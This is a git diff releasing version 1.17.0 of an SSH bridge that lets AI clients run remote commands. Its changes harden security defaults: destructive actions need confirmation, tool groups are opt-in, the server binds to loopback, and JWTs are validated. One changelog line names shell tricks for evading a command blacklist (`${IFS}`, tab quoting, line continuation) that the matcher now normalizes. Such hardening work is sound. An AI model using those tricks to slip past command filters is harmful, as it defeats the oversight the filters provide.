diff --git a/.gitignore b/.gitignore index f6a91828..6a03053c 100644 --- a/.gitignore +++ b/.gitignore @@ -72,6 +72,9 @@ flamegraph.svg id_rsa id_rsa.pub id_ed25519 + +# Allow OAuth test-only RSA fixtures (synthetic, never used outside tests) +!tests/fixtures/oauth/*.pem id_ed25519.pub id_ecdsa id_ecdsa.pub diff --git a/.well-known/mcp/server-card.json b/.well-known/mcp/server-card.json index 1013766b..ea34109a 100644 --- a/.well-known/mcp/server-card.json +++ b/.well-known/mcp/server-card.json @@ -1,6 +1,6 @@ { "name": "mcp-ssh-bridge", - "version": "1.16.0", + "version": "1.17.0", "description": "Secure SSH bridge for AI-powered remote server management. 357 tools across 75 groups covering Linux, Windows, Docker, Kubernetes, and more.", "capabilities": { "tools": true, diff --git a/CHANGELOG.md b/CHANGELOG.md index 44c3dfef..9a6c1d7c 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -5,6 +5,116 @@ All notable changes to this project will be documented in this file. The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.1.0/), and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html). +## [Unreleased] + +## [1.17.0] - 2026-05-10 + +### Summary + +**Full security audit (2026-05-09) — 30+ findings remediated across YAML +parsing, JWT validation, transport defaults, session isolation, secret +zeroization, and tool-group exposure.** Two BREAKING default flips +(FIND-022 elicitation + FIND-024 tool_groups) plus per-session isolation +hardening (FIND-033/034/035/036/037/038), Zeroizing on every cred-bearing +struct (FIND-014/028/029/030), saphyr Budget on every YAML parse site +(FIND-001/002/004/032), OAuth/JWT spec compliance (FIND-006/007), +russh algo pinning + rekey limits (FIND-008), HTTP middleware hardening +(FIND-005), SSH error sanitization (FIND-016), `deny_unknown_fields` +on every config struct (FIND-017), and supply-chain cleanup +(FIND-018/025/026/027). Test suite: ~6,973 → 7,200+ tests (new +integration suites: `cross_session_cancel`, `multisession_isolation`, +`per_session_state`, `per_session_log_level`, `oauth_keys_loaded`, +`saphyr_budget`, `deny_unknown_fields`, `destructive_default`, +`http_middleware`, `ssh_config_discovery_default`, `ssh_preferred_algos`, +`sudo_password_zeroizing`, `security_audit_redaction`). + +### Changed (BREAKING) + +- **Security: `tool_groups` default-disabled, ships an 8-group minimal + profile** (FIND-024). The pre-FIND-024 behaviour was "unlisted = + enabled": `tool_groups: { groups: {} }` registered all 75 groups / + 357 handlers out of the box. An operator who only needed `docker` + + `service` was also exposed to AD/LDAP/Vault/K8s/AWS/ESXi/HyperV / + Windows-only handlers. Unlisted groups now resolve via membership in + the new `MINIMAL_DEFAULT_GROUPS` const: `[core, file_ops, directory, + process, monitoring, network, systemd, sessions]` — everything else + requires explicit opt-in via `tool_groups.groups: { groupname: true }`. + Operators who relied on the old all-enabled behaviour must enumerate + the groups they need (or set every group they want to `true`). + Migration documented in `config/config.example.yaml`. + +- **Security: `security.require_elicitation_on_destructive` now defaults to + `true`** (was `false`). Destructive tools annotated `destructive_hint: true` + (e.g., `ssh_process_kill`, `ssh_file_write`, `ssh_k8s_delete`, + `ssh_terraform_apply`, …) now require MCP `elicitation/create` + confirmation by default. Operators who relied on the old permissive + behaviour must explicitly set + `security.require_elicitation_on_destructive: false` in their config + (NOT RECOMMENDED in production — a compromised MCP client could + otherwise mass-execute destructive tools without surfacing to a human). + +- **Security: `SshConfigDiscovery` default off** (FIND-023). `~/.ssh/config` + is no longer parsed unless the operator explicitly opts in. Eliminates + the implicit on-disk attack surface for hosts not declared in + `config.yaml`. + +### Security + +- **YAML parser: enforce saphyr `Budget` on every parse site** + (FIND-001/002/004/032). Caps node count + alias depth + recursion to + prevent resource-exhaustion via crafted runbooks/configs. +- **HTTP transport: defaults to loopback; refuses anonymous public bind.** + Public bind requires explicit auth + origin allowlist. +- **HTTP middleware: timeout + body-limit + request-id + sensitive-header + redaction** (FIND-005). +- **JWT: signature verification via `jsonwebtoken` (Vuln 2)** + require + `sub`/`iss`/`aud` spec claims (FIND-007). +- **OAuth: load keys at boot, share `Arc`** (FIND-006). +- **russh: pin `Preferred` algorithms + rekey limits** (FIND-008). +- **SSH errors: sanitize at every connect-phase site** (FIND-016) — + no more leaking key paths/host details on auth failure. +- **Path traversal: canonicalize in `validate_root_scope` (Vuln 11).** +- **Audit log: sanitize commands before write** — no plaintext secrets. +- **Heredoc: randomize terminator in `template_apply`** — defeats + attacker-supplied terminator injection. +- **Env vars: validate names in `file_template` builder.** +- **LDAP: RFC 4515-escape values in filters.** +- **systemd: allowlist `unit_type` in `list_command`.** +- **Firewall: allowlist protocol values.** +- **Blacklist matcher: normalize `${IFS}` / `$'\t'` / line-continuation + before match** (defeats common bypass tricks). +- **Per-session isolation:** + - `PendingRequests` (Vuln 8 part 2) + UUID-based unguessable IDs + (Vuln 8 part 1) + - `SessionCapabilities` (Vuln 9) + - `active_requests` map (FIND-038) + - `runtime` / `notification` / `resource_subs` / `roots` (FIND-033/034/036/037) + - `log_level` (FIND-035) +- **Secret zeroization:** + - `HostConfig.sudo_password` (FIND-028) + - `db_password` Args (FIND-029) + - vault `Args.data` (FIND-030) + - `SocksProxyConfig.password` (FIND-014) + - vault/db secrets piped via stdin/tempfile (FIND-031) +- **`deny_unknown_fields` on every config + runbook struct** (FIND-017) — + unknown keys are now hard errors, not silent ignores. + +### Changed + +- **Reliability: replace `expect`/`unwrap` with `?`/`Err` on Result-returning + functions** (FIND-010/011/012/013). +- **Clippy clean across `--workspace --all-targets --all-features`** + (FIND-019/020). +- **CI: `cargo-geiger` fallback + baseline** (FIND-021). +- **Domain layer: move YAML helper into domain/** (hexagonal compliance). + +### Removed / Deps + +- **Drop archived `shellexpand`, use `dirs::home_dir`** (FIND-025). +- **Patch `winrm-rs` to drop obsolete `reqwest` feature** (FIND-018). +- **Supply-chain monitoring entries for `saphyr` + `tokio-socks`** + (FIND-026/027). + ## [1.16.0] - 2026-05-03 ### Summary diff --git a/Cargo.lock b/Cargo.lock index 4bd2aa06..0a7eecb7 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -2642,6 +2642,21 @@ dependencies = [ "thiserror 2.0.18", ] +[[package]] +name = "jsonwebtoken" +version = "9.3.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "5a87cc7a48537badeae96744432de36f4be2b4a34a05a5ef32e9dd8a1c169dde" +dependencies = [ + "base64", + "js-sys", + "pem", + "ring", + "serde", + "serde_json", + "simple_asn1", +] + [[package]] name = "k8s-openapi" version = "0.27.1" @@ -2865,7 +2880,7 @@ checksum = "47e1ffaa40ddd1f3ed91f717a33c8c0ee23fff369e3aa8772b9605cc1d22f4c3" [[package]] name = "mcp-ssh-bridge" -version = "1.16.1" +version = "1.17.0" dependencies = [ "aho-corasick", "anyhow", @@ -2873,6 +2888,7 @@ dependencies = [ "aws-config", "aws-sdk-ssm", "axum", + "base64", "chrono", "clap", "clap_complete", @@ -2886,6 +2902,7 @@ dependencies = [ "jaq-core", "jaq-json", "jaq-std", + "jsonwebtoken", "k8s-openapi", "kube", "mcp-ssh-bridge-macros", @@ -2905,7 +2922,6 @@ dependencies = [ "serde-saphyr", "serde_json", "sha2 0.10.9", - "shellexpand", "similar", "tempfile", "thiserror 2.0.18", @@ -4835,15 +4851,6 @@ dependencies = [ "lazy_static", ] -[[package]] -name = "shellexpand" -version = "3.1.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "32824fab5e16e6c4d86dc1ba84489390419a39f97699852b66480bb87d297ed8" -dependencies = [ - "dirs", -] - [[package]] name = "shlex" version = "1.3.0" @@ -4892,6 +4899,18 @@ version = "2.7.0" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "bbbb5d9659141646ae647b42fe094daf6c6192d1620870b449d9557f748b2daa" +[[package]] +name = "simple_asn1" +version = "0.6.4" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "0d585997b0ac10be3c5ee635f1bab02d512760d14b7c468801ac8a01d9ae5f1d" +dependencies = [ + "num-bigint", + "num-traits", + "thiserror 2.0.18", + "time", +] + [[package]] name = "slab" version = "0.4.12" @@ -5097,6 +5116,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "743bd48c283afc0388f9b8827b976905fb217ad9e647fae3a379a9283c4def2c" dependencies = [ "deranged", + "itoa", "num-conv", "powerfmt", "serde_core", @@ -5346,10 +5366,12 @@ dependencies = [ "iri-string", "mime", "pin-project-lite", + "tokio", "tower", "tower-layer", "tower-service", "tracing", + "uuid", ] [[package]] @@ -6423,3 +6445,8 @@ name = "zmij" version = "1.0.21" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "b8848ee67ecc8aedbaf3e4122217aff892639231befc6a1b58d29fff4c2cabaa" + +[[patch.unused]] +name = "winrm-rs" +version = "1.1.0" +source = "git+https://github.com/muchiny/winrm-rs.git?rev=573dadf5abcaed681f65999f216164c9f33a6250#573dadf5abcaed681f65999f216164c9f33a6250" diff --git a/Cargo.toml b/Cargo.toml index 2b840757..27858cfd 100644 --- a/Cargo.toml +++ b/Cargo.toml @@ -3,7 +3,7 @@ members = [".", "crates/mcp-ssh-bridge-macros"] [package] name = "mcp-ssh-bridge" -version = "1.16.1" +version = "1.17.0" edition = "2024" rust-version = "1.94" description = "MCP server that bridges Claude Code to air-gapped environments via SSH" @@ -93,7 +93,6 @@ regex = "1" aho-corasick = "1" chrono = { version = "0.4", default-features = false, features = ["clock", "serde", "std"] } dirs = "6" -shellexpand = "3" tokio-socks = "0.5" async-trait = "0.1" sha2 = "0.10" @@ -110,7 +109,7 @@ rayon = "1" # HTTP transport (optional, for Streamable HTTP + OAuth) axum = { version = "0.8", features = ["json"], optional = true } tower = { version = "0.5", optional = true } -tower-http = { version = "0.6", features = ["cors", "limit"], optional = true } +tower-http = { version = "0.6", features = ["cors", "limit", "timeout", "request-id", "sensitive-headers"], optional = true } hyper-util = { version = "0.1", features = ["tokio"], optional = true } tokio-stream = { version = "0.1", optional = true } @@ -149,6 +148,7 @@ tracing-opentelemetry = { version = "0.32", optional = true } similar = "2.6" inventory = "0.3" mcp-ssh-bridge-macros = { version = "0.1.0", path = "crates/mcp-ssh-bridge-macros" } +jsonwebtoken = "9" [dev-dependencies] tempfile = "3" @@ -157,6 +157,7 @@ filetime = "0.2" tracing-test = "0.2" proptest = "1" insta = { version = "1", features = ["json", "yaml"] } +base64 = "0.22.1" [[bench]] name = "validator_bench" @@ -224,3 +225,12 @@ missing_errors_doc = "allow" missing_panics_doc = "allow" module_name_repetitions = "allow" must_use_candidate = "allow" + +# ============================================================================= +# Patch overrides (FIND-018 / audit 2026-05-09) +# ============================================================================= +# winrm-rs 1.0 on crates.io declares an obsolete reqwest feature +# (`webpki-roots`) that blocks `cargo outdated` resolution. Local fork +# carries the fix; pin to it until winrm-rs > 1.0 is published. +[patch.crates-io] +winrm-rs = { git = "https://github.com/muchiny/winrm-rs.git", rev = "573dadf5abcaed681f65999f216164c9f33a6250" } diff --git a/Makefile b/Makefile index 3a3a5b65..a3d97977 100644 --- a/Makefile +++ b/Makefile @@ -159,7 +159,15 @@ security-audit: audit deny security-tests geiger # Scan for unsafe code in dependencies (requires cargo-geiger) geiger: - @command -v cargo-geiger >/dev/null 2>&1 && cargo geiger --all-features --output-format ascii || echo "cargo-geiger not installed, run: cargo install cargo-geiger --locked" + @command -v cargo-geiger >/dev/null 2>&1 || { echo "cargo-geiger not installed, run: cargo install cargo-geiger --locked"; exit 0; } + @# FIND-021 (audit 2026-05-09): cloud features (aws-sdk, azure, gcp) + @# pull nkeys-0.4.5 which cargo-geiger fails to extract on a cold + @# graph. Pre-fetch first; if extraction still fails on --all-features, + @# fall back to --forbid-only (acceptable since the workspace already + @# enforces `#![forbid(unsafe_code)]`). + @cargo fetch >/dev/null 2>&1 || true + @cargo geiger --all-features --output-format Ascii 2>/dev/null \ + || cargo geiger --forbid-only --output-format Ascii # Check for semver-breaking API changes (requires cargo-semver-checks) semver-checks: diff --git a/config/config.example.yaml b/config/config.example.yaml index 881c2ea2..fccf1bdb 100644 --- a/config/config.example.yaml +++ b/config/config.example.yaml @@ -238,8 +238,12 @@ security: # When true, the server asks the user to confirm via the client UI before # executing the destructive operation; on decline the call is rejected. # Requires a client that advertises the elicitation capability. - # Default: false (opt-in). - require_elicitation_on_destructive: false + # + # Default: true (security-first; FIND-022). Set to `false` to opt out and + # allow destructive tools to execute without confirmation — NOT RECOMMENDED + # in production. A compromised MCP client could otherwise mass-execute + # destructive tools without surfacing to a human. + require_elicitation_on_destructive: true # ============================================================================= # LIMITS AND TIMEOUTS @@ -355,9 +359,38 @@ audit: # 🔧 TOOL GROUPS # ============================================================================= # Enable or disable groups of tools to reduce the MCP context sent to the LLM. -# By default, all groups are enabled. Set a group to false to disable it. # -# Available groups (74 groups, 337 tools): +# ⚠️ BREAKING (FIND-024, security audit 2026-05-09): +# Unlisted groups are now DISABLED by default. The pre-FIND-024 behaviour was +# "unlisted = enabled", which exposed all 75 groups / 357 handlers out of the +# box (AD, LDAP, Vault, K8s, AWS, ESXi, Hyper-V, Windows-only tools, ...) to +# every operator workflow regardless of whether they were needed. +# +# The default profile now ships only 8 minimal-and-broadly-useful groups: +# +# core (ssh_exec / exec_multi / status / health / history / output_fetch) +# file_ops (ssh_file_read / write / chmod / chown / stat / diff / patch / template) +# directory (ssh_ls, ssh_find) +# process (ssh_process_list / kill / top) +# monitoring (ssh_metrics / metrics_multi / tail / disk_usage) +# network (ssh_net_connections / interfaces / routes / ping / traceroute / dns) +# systemd (ssh_service_status / start / stop / restart / enable / disable / logs / list / daemon_reload) +# sessions (ssh_session_create / exec / list / close) +# +# Anything else (containers, K8s, AD, LDAP, cloud, ESXi, Hyper-V, Windows-specific, +# vault, terraform, git, ...) requires explicit opt-in below. +# +# To enable a non-default group, list it explicitly with `true`. To disable a +# group from the default profile, list it with `false`. +# +# Examples: +# tool_groups: +# groups: +# docker: true # opt in to Docker tools +# kubernetes: true # opt in to kubectl + helm +# sessions: false # remove tmux sessions from the default profile +# +# Available groups (75 groups, 357 tools): # # --- Linux (59 groups) --- # core - ssh_exec, ssh_exec_multi, ssh_status, ssh_health, ssh_history, @@ -486,83 +519,91 @@ audit: # ssh_recording_replay, ssh_recording_verify tool_groups: + # FIND-024: empty map -> default profile (the 8 groups listed in the doc + # block above). Add `groupname: true` to OPT IN to a non-default group; + # `groupname: false` to OPT OUT of a default-profile group. groups: {} - # --- Linux --- - # sessions: false # Disable persistent shell sessions - # monitoring: false # Disable metrics and tail tools - # file_transfer: false # Disable SFTP upload/download/sync + # --- Default-profile groups (already enabled — uncomment with `false` to OPT OUT) --- + # core: false # ⚠️ removes ssh_exec — every diagnostic command depends on it # file_ops: false # Disable file read/write/chmod/diff/patch/template - # tunnels: false # Disable SSH port forwarding tunnels # directory: false # Disable directory listing and file search # process: false # Disable process management + # monitoring: false # Disable metrics and tail tools # network: false # Disable network diagnostics # systemd: false # Disable systemd service management - # systemd_timers: false # Disable systemd timer management - # firewall: false # Disable firewall management - # package: false # Disable package management - # cron: false # Disable cron job management - # user_management: false # Disable user/group management - # storage: false # Disable storage/LVM/mount tools - # journald: false # Disable journald log queries - # security_modules: false # Disable SELinux/AppArmor tools - # backup: false # Disable backup tools - # network_equipment: false # Disable network switch/router tools - # ldap: false # Disable LDAP directory tools - # database: false # Disable generic database tools - # redis: false # Disable Redis tools - # postgresql: false # Disable PostgreSQL tools - # mysql: false # Disable MySQL tools - # mongodb: false # Disable MongoDB tools - # docker: false # Disable Docker tools - # podman: false # Disable Podman tools - # kubernetes: false # Disable kubectl/helm tools - # esxi: false # Disable VMware ESXi tools - # nginx: false # Disable Nginx tools - # apache: false # Disable Apache HTTPD tools - # letsencrypt: false # Disable Let's Encrypt tools - # ansible: false # Disable Ansible tools - # terraform: false # Disable Terraform IaC tools - # vault: false # Disable HashiCorp Vault tools - # git: false # Disable Git repository tools - # certificates: false # Disable TLS certificate tools - # network_security: false # Disable port scan/SSL audit/fail2ban - # compliance: false # Disable CIS/STIG benchmark tools - # security_scan: false # Disable SBOM & vulnerability scanning - # diagnostics: false # Disable intelligent diagnostics - # performance: false # Disable performance profiling tools - # container_logs: false # Disable container log analysis - # cron_analysis: false # Disable cron conflict analysis - # drift: false # Disable environment drift detection - # cloud: false # Disable AWS CLI/cloud metadata tools - # inventory: false # Disable host discovery/CMDB sync - # multicloud: false # Disable multi-cloud resource tools - # alerting: false # Disable alert monitoring tools - # capacity: false # Disable capacity forecasting tools - # incident: false # Disable incident response tools - # orchestration: false # Disable multi-host orchestration - # runbooks: false # Disable runbook engine tools - # log_aggregation: false # Disable cross-host log tools - # key_management: false # Disable SSH key management tools - # chatops: false # Disable webhook/Slack notification tools - # templates: false # Disable config template tools - # pty: false # Disable interactive PTY tools + # sessions: false # Disable persistent shell sessions + # + # --- Opt-in groups (currently DISABLED — uncomment with `true` to OPT IN) --- + # --- Linux --- + # file_transfer: true # Enable SFTP upload/download/sync + # tunnels: true # Enable SSH port forwarding tunnels + # systemd_timers: true # Enable systemd timer management + # firewall: true # Enable firewall management + # package: true # Enable package management + # cron: true # Enable cron job management + # user_management: true # Enable user/group management + # storage: true # Enable storage/LVM/mount tools + # journald: true # Enable journald log queries + # security_modules: true # Enable SELinux/AppArmor tools + # backup: true # Enable backup tools + # network_equipment: true # Enable network switch/router tools + # ldap: true # Enable LDAP directory tools + # database: true # Enable generic database tools + # redis: true # Enable Redis tools + # postgresql: true # Enable PostgreSQL tools + # mysql: true # Enable MySQL tools + # mongodb: true # Enable MongoDB tools + # docker: true # Enable Docker tools + # podman: true # Enable Podman tools + # kubernetes: true # Enable kubectl/helm tools + # esxi: true # Enable VMware ESXi tools + # nginx: true # Enable Nginx tools + # apache: true # Enable Apache HTTPD tools + # letsencrypt: true # Enable Let's Encrypt tools + # ansible: true # Enable Ansible tools + # terraform: true # Enable Terraform IaC tools + # vault: true # Enable HashiCorp Vault tools + # git: true # Enable Git repository tools + # certificates: true # Enable TLS certificate tools + # network_security: true # Enable port scan/SSL audit/fail2ban + # compliance: true # Enable CIS/STIG benchmark tools + # security_scan: true # Enable SBOM & vulnerability scanning + # diagnostics: true # Enable intelligent diagnostics + # performance: true # Enable performance profiling tools + # container_logs: true # Enable container log analysis + # cron_analysis: true # Enable cron conflict analysis + # drift: true # Enable environment drift detection + # cloud: true # Enable AWS CLI/cloud metadata tools + # inventory: true # Enable host discovery/CMDB sync + # multicloud: true # Enable multi-cloud resource tools + # alerting: true # Enable alert monitoring tools + # capacity: true # Enable capacity forecasting tools + # incident: true # Enable incident response tools + # orchestration: true # Enable multi-host orchestration + # runbooks: true # Enable runbook engine tools + # log_aggregation: true # Enable cross-host log tools + # key_management: true # Enable SSH key management tools + # chatops: true # Enable webhook/Slack notification tools + # templates: true # Enable config template tools + # pty: true # Enable interactive PTY tools + # awx: true # Enable AWX REST API tools # --- Windows --- - # windows_services: false # Disable Windows service management - # windows_events: false # Disable Windows Event Log tools - # active_directory: false # Disable Active Directory tools - # scheduled_tasks: false # Disable Windows Scheduled Tasks - # windows_firewall: false # Disable Windows Firewall tools - # iis: false # Disable IIS web server tools - # windows_updates: false # Disable Windows Update tools - # windows_perf: false # Disable Windows Performance Counter tools - # hyperv: false # Disable Hyper-V virtual machine tools - # windows_registry: false # Disable Windows Registry tools - # windows_features: false # Disable Windows Features tools - # windows_network: false # Disable Windows Network tools - # windows_process: false # Disable Windows Process tools + # windows_services: true # Enable Windows service management + # windows_events: true # Enable Windows Event Log tools + # active_directory: true # Enable Active Directory tools + # scheduled_tasks: true # Enable Windows Scheduled Tasks + # windows_firewall: true # Enable Windows Firewall tools + # iis: true # Enable IIS web server tools + # windows_updates: true # Enable Windows Update tools + # windows_perf: true # Enable Windows Performance Counter tools + # hyperv: true # Enable Hyper-V virtual machine tools + # windows_registry: true # Enable Windows Registry tools + # windows_features: true # Enable Windows Features tools + # windows_network: true # Enable Windows Network tools + # windows_process: true # Enable Windows Process tools # --- Cross-platform --- - # config: false # Disable runtime config tools - # recording: false # Disable session recording tools + # config: true # Enable runtime config tools + # recording: true # Enable session recording tools # ============================================================================= # OBSERVABILITY (feature = "otel") @@ -598,6 +639,41 @@ tool_groups: # ./target/release/mcp-ssh-bridge tool ssh_status # # → open http://localhost:16686 and search service "mcp-ssh-bridge" +# ============================================================================= +# HTTP TRANSPORT (Streamable HTTP, MCP 2025-11-25) +# ============================================================================= +# Optional. Enables `mcp-ssh-bridge serve-http`. Required only when running +# the bridge as a remote MCP server; stdio mode does not need this section. +# +# OAuth: when oauth.enabled = true, EITHER static_keys OR jwks_uri MUST be +# configured. The server fails closed at boot otherwise (FIND-006). +# +# JWKS HTTP fetching is not yet wired — configure static_keys for now. +# +# http: +# bind: "127.0.0.1:3000" +# max_body_size: 1048576 # 1 MiB +# sessionTimeoutSeconds: 1800 # 30 min +# max_sessions: 100 +# allowed_origins: +# - "https://app.example.com" +# oauth: +# enabled: true +# issuer: "https://auth.example.com" +# audience: "mcp-ssh-bridge" +# clientId: "mcp-ssh-bridge" +# requiredScopes: ["mcp:tools:execute"] +# # Static keys are loaded once at boot and addressed by JWT `kid`. +# # Use this when your IdP exposes long-lived signing keys you can copy +# # in. Prefer jwksUri (once wired) for IdPs that rotate keys. +# staticKeys: +# - kid: "kid-2026-q2" +# publicKeyPem: | +# -----BEGIN PUBLIC KEY----- +# MIIB... +# -----END PUBLIC KEY----- +# # jwksUri: "https://auth.example.com/.well-known/jwks.json" + # ============================================================================= # SSH CONFIG AUTO-DISCOVERY # ============================================================================= @@ -607,7 +683,11 @@ tool_groups: # Discovered hosts use AcceptNew host key verification by default. ssh_config: - enabled: true # Set to false to disable auto-discovery + # FIND-023 (audit 2026-05-09): default is `false`. Discovery exposes the + # operator's full personal SSH inventory (often >> the YAML-declared + # production set) to MCP clients via the bridge's host-listing surfaces. + # Set to `true` to opt in to time-to-first-command convenience. + enabled: false # path: ~/.ssh/config # Default path # exclude: # Host aliases to skip # - personal-server diff --git a/deny.toml b/deny.toml index 78eab7fd..12edddae 100644 --- a/deny.toml +++ b/deny.toml @@ -14,6 +14,9 @@ exclude-dev = false # ============================================================================= [advisories] version = 2 +# Audit 2026-05-09 (FIND-026): yanked releases break CI so a maintainer +# pulling a backdoored release does not silently survive. +yanked = "deny" # RUSTSEC-2023-0071: Marvin Attack on RSA - no fix available upstream # Transitive dependency from russh -> rsa crate # Safe for local use, timing attack requires network observation diff --git a/dxt/manifest.json b/dxt/manifest.json index 3d4aa167..be21a996 100644 --- a/dxt/manifest.json +++ b/dxt/manifest.json @@ -2,7 +2,7 @@ "dxt_version": "0.1", "name": "mcp-ssh-bridge", "display_name": "MCP SSH Bridge", - "version": "1.16.0", + "version": "1.17.0", "description": "Execute commands securely on remote servers via SSH. 357 tools for Linux, Windows, Docker, Kubernetes, and more, with progress / elicitation / sampling / logger MCP integration.", "author": { "name": "muchiny" diff --git a/src/cli/mod.rs b/src/cli/mod.rs index 41cec5e4..dfbe0858 100644 --- a/src/cli/mod.rs +++ b/src/cli/mod.rs @@ -109,9 +109,16 @@ pub enum Commands { /// Start MCP server over Streamable HTTP transport #[cfg(feature = "http")] ServeHttp { - /// Bind address (overrides config, e.g. "0.0.0.0:3000") + /// Bind address (overrides config, e.g. "127.0.0.1:3000") #[arg(short, long)] bind: Option, + + /// SECURITY: allow binding to a non-loopback address with OAuth + /// disabled. Required only when fronted by an external auth proxy. + /// Without this flag, non-loopback binds are refused unless OAuth + /// is enabled in config. + #[arg(long)] + insecure_bind: bool, }, /// Execute a command on a remote host diff --git a/src/cli/runner.rs b/src/cli/runner.rs index fa9fdad5..38347d62 100644 --- a/src/cli/runner.rs +++ b/src/cli/runner.rs @@ -369,8 +369,8 @@ pub async fn run_validate(config: Arc) -> Result<()> { issues.push(format!("Host '{name}': user is empty")); } if let crate::config::AuthConfig::Key { ref path, .. } = host.auth { - let expanded = shellexpand::tilde(path); - if !std::path::Path::new(expanded.as_ref()).exists() { + let expanded = crate::path_utils::home_expand_or_input(path); + if !std::path::Path::new(&expanded).exists() { warnings.push(format!("Host '{name}': key file '{path}' not found")); } } @@ -830,9 +830,9 @@ pub async fn run_upload( ), })?; - // Expand and check local path + // Expand and check local path (`~` -> home dir; pass-through otherwise). let local_path_str = local_path.to_string_lossy(); - let expanded_path = shellexpand::tilde(&local_path_str).to_string(); + let expanded_path = crate::path_utils::home_expand_or_input(&local_path_str); let local_path = Path::new(&expanded_path); if !local_path.exists() { @@ -996,9 +996,9 @@ pub async fn run_download( ), })?; - // Expand local path + // Expand local path (`~` -> home dir; pass-through otherwise). let local_path_str = local_path.to_string_lossy(); - let expanded_path = shellexpand::tilde(&local_path_str).to_string(); + let expanded_path = crate::path_utils::home_expand_or_input(&local_path_str); let local_path = Path::new(&expanded_path); // Create parent directories if needed diff --git a/src/config/loader.rs b/src/config/loader.rs index 4af65794..3a3f80f3 100644 --- a/src/config/loader.rs +++ b/src/config/loader.rs @@ -42,7 +42,7 @@ pub fn load_config(path: &Path) -> Result { } let content = std::fs::read_to_string(path)?; - let mut config: Config = serde_saphyr::from_str(&content)?; + let mut config: Config = crate::domain::yaml::parse_yaml(&content)?; // Merge hosts from ~/.ssh/config if discovery is enabled if config.ssh_config.enabled { @@ -57,8 +57,8 @@ pub fn load_config(path: &Path) -> Result { /// Discover hosts from SSH config and merge into the main config. /// YAML-defined hosts take precedence over discovered ones. fn merge_ssh_config_hosts(config: &mut Config) { - let ssh_config_path = shellexpand::tilde(&config.ssh_config.path); - let path = Path::new(ssh_config_path.as_ref()); + let ssh_config_path = crate::path_utils::home_expand_or_input(&config.ssh_config.path); + let path = Path::new(&ssh_config_path); if !path.exists() { debug!(path = %ssh_config_path, "SSH config file not found, skipping discovery"); @@ -154,8 +154,8 @@ fn validate_config(config: &Config) -> Result<()> { // Validate key path exists and permissions (for key auth) if let super::types::AuthConfig::Key { path, .. } = &host.auth { - let expanded = shellexpand::tilde(path); - let key_path = Path::new(expanded.as_ref()); + let expanded = crate::path_utils::home_expand_or_input(path); + let key_path = Path::new(&expanded); if !key_path.exists() { return Err(BridgeError::SshKeyNotFound { path: path.clone() }); } diff --git a/src/config/mod.rs b/src/config/mod.rs index e7bb3888..f4ae031a 100644 --- a/src/config/mod.rs +++ b/src/config/mod.rs @@ -1,6 +1,6 @@ mod loader; pub mod ssh_config; -mod types; +pub mod types; mod watcher; pub use loader::{default_config_path, load_config}; diff --git a/src/config/ssh_config.rs b/src/config/ssh_config.rs index 25df95c1..9c5b2090 100644 --- a/src/config/ssh_config.rs +++ b/src/config/ssh_config.rs @@ -144,8 +144,8 @@ impl PartialHost { let auth = if let Some(key_path) = identity_file { // Expand ~ in the path - let expanded = shellexpand::tilde(key_path); - let path = std::path::Path::new(expanded.as_ref()); + let expanded = crate::path_utils::home_expand_or_input(key_path); + let path = std::path::Path::new(&expanded); if path.exists() { AuthConfig::Key { path: key_path.clone(), diff --git a/src/config/types.rs b/src/config/types.rs index 61edfd5d..bfc2ca8d 100644 --- a/src/config/types.rs +++ b/src/config/types.rs @@ -4,6 +4,7 @@ use std::path::PathBuf; use zeroize::Zeroizing; #[derive(Debug, Clone, Default, Deserialize, Serialize)] +#[serde(deny_unknown_fields)] pub struct Config { #[serde(default)] pub hosts: HashMap, @@ -46,6 +47,7 @@ pub struct Config { /// This enables air-gapped environments where AWX is not directly /// reachable from the MCP server host. #[derive(Debug, Clone, Deserialize, Serialize)] +#[serde(deny_unknown_fields)] pub struct AwxConfig { /// SSH host alias (from `hosts` section) used to relay API calls. pub ssh_host: String, @@ -76,8 +78,9 @@ fn default_true() -> bool { /// HTTP transport configuration for the YAML config. #[derive(Debug, Clone, Deserialize, Serialize)] +#[serde(deny_unknown_fields)] pub struct HttpTransportConfig { - /// Bind address (default: `"0.0.0.0:3000"`). + /// Bind address (default: `"127.0.0.1:3000"` — loopback only). #[serde(default = "default_http_bind")] pub bind: String, @@ -102,6 +105,13 @@ pub struct HttpTransportConfig { /// their public origin (e.g. `https://app.example.com`). #[serde(default = "default_http_allowed_origins")] pub allowed_origins: Vec, + + /// SECURITY: bypass the loopback-or-OAuth check enforced by `serve`. + /// Required only when intentionally exposing the bridge on a public + /// interface without OAuth (e.g. behind a separate auth proxy). + /// Defaults to `false`. + #[serde(default)] + pub allow_unsafe_bind: bool, } impl Default for HttpTransportConfig { @@ -113,12 +123,13 @@ impl Default for HttpTransportConfig { max_sessions: default_http_max_sessions(), oauth: HttpOAuthConfig::default(), allowed_origins: default_http_allowed_origins(), + allow_unsafe_bind: false, } } } fn default_http_bind() -> String { - "0.0.0.0:3000".to_string() + "127.0.0.1:3000".to_string() } fn default_http_allowed_origins() -> Vec { @@ -146,7 +157,7 @@ const fn default_http_max_sessions() -> usize { /// OAuth configuration for the HTTP transport (YAML-serializable). #[derive(Debug, Clone, Default, Deserialize, Serialize)] -#[serde(rename_all = "camelCase")] +#[serde(rename_all = "camelCase", deny_unknown_fields)] pub struct HttpOAuthConfig { /// Enable OAuth authentication (default: false). #[serde(default)] @@ -161,6 +172,11 @@ pub struct HttpOAuthConfig { pub audience: String, /// JWKS endpoint for key validation. + /// + /// NOTE: JWKS HTTP fetching is not yet wired in this build — + /// configure [`Self::static_keys`] for now. The follow-up will pipe + /// `reqwest`/`hyper` through extensions and fetch this document at + /// boot. #[serde(default)] pub jwks_uri: Option, @@ -171,9 +187,33 @@ pub struct HttpOAuthConfig { /// Required scopes for access. #[serde(default)] pub required_scopes: Vec, + + /// Static signing keys for token validation, keyed by `kid`. + /// + /// Each entry is `(key_id, pem_encoded_public_key)`. Either + /// `static_keys` or `jwks_uri` MUST be configured when + /// `enabled = true`; otherwise the server fails closed at boot + /// rather than rejecting every token at request time. + #[serde(default)] + pub static_keys: Vec, } 